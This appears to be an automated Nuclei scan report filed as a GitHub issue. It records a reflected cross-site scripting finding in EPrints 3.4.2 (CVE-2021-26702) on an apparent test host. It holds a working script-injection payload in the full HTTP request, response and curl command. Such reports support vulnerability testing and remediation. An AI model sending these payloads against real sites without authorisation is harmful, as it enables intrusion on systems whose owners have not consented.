search

mkrs2404 / tickets

0 stars 0 forks source link

EPrints 3.4.2 - Cross-Site Scripting (CVE-2021-26702) found on honey.scanme.sh #16

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2021-26702 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/e219ff1e2b7e28eacfe873521413d65b

Template Information

Key Value
Name EPrints 3.4.2 - Cross-Site Scripting
Authors ritikchaddha
Tags cve2021, cve, xss, eprints
Severity medium
Description EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
Remediation Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
CVSS-Metrics CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID CWE-79
CVE-ID CVE-2021-26702
CVSS-Score 6.10
product eprints
vendor eprints

Request

GET /cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 344
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT

GET /cgi/dataset_dictionary?dataset=zulu</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1' 'https://honey.scanme.sh/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5